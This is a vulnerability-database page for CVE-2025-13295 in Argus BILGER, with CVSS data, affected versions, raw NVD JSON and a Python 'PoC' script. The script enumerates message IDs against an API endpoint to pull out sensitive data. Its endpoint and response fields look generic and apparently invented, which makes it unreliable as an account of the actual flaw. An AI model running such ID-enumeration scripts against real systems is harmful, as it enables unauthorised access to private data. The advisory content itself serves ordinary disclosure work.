Security Vulnerability Report
中文
CVE-2025-13295 CVSS 7.5 HIGH

CVE-2025-13295

Published: 2025-12-02 14:16:23
Last Modified: 2026-02-12 17:30:17

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Argus Technology Inc. BILGER allows Choosing Message Identifier.This issue affects BILGER: before 2.4.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:argusteknoloji:bilger:*:*:*:*:*:*:*:* - VULNERABLE
Argus BILGER < 2.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13295 PoC - Message Identifier Manipulation # This is a conceptual proof of concept for educational purposes import requests import json TARGET_HOST = "http://target-server.com" VULN_ENDPOINT = "/api/message" def exploit_cve_2025_13295(): """ Demonstrates the message identifier manipulation vulnerability. Attackers can access sensitive data by manipulating message IDs. """ headers = { "Content-Type": "application/json", "User-Agent": "CVE-2025-13295-PoC" } # Try to access messages by manipulating identifier for msg_id in range(1, 100): payload = { "message_id": msg_id, "action": "retrieve" } try: response = requests.post( f"{TARGET_HOST}{VULN_ENDPOINT}", json=payload, headers=headers, timeout=10 ) if response.status_code == 200: data = response.json() # Check if sensitive data is returned if "sensitive_data" in data or "user_info" in data: print(f"[!] Potential sensitive data found at ID {msg_id}") print(f"Response: {json.dumps(data, indent=2)}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] No vulnerable endpoint found or data not accessible") return False if __name__ == "__main__": print("CVE-2025-13295 PoC - Argus BILGER Message ID Manipulation") print("=" * 60) exploit_cve_2025_13295()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13295", "sourceIdentifier": "[email protected]", "published": "2025-12-02T14:16:22.677", "lastModified": "2026-02-12T17:30:16.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Argus Technology Inc. BILGER allows Choosing Message Identifier.This issue affects BILGER: before 2.4.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:argusteknoloji:bilger:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.9", "matchCriteriaId": "DB77AB40-909F-452F-BCEC-9B533972025B"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0423", "source": "[email protected]", "tags": ["US Government Resource", "Vendor Advisory"]}]}}